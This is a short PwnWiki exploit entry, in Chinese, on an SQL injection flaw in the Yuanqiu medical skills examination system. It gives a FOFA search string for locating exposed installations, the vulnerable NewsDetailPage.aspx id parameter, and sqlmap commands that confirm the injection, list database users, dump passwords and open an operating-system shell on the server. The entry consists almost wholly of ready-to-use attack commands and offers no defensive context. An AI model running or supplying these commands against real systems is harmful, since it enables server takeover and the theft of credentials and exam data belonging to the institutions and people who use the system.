遠秋醫學技能考試系統 SQL注入漏洞

From PwnWiki

FOFA

远秋医学技能考试系统

注入點

http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1

SQLMAP

sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" -p id -batch

sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" -users
sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" --password 

sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" --random-agent --os-shell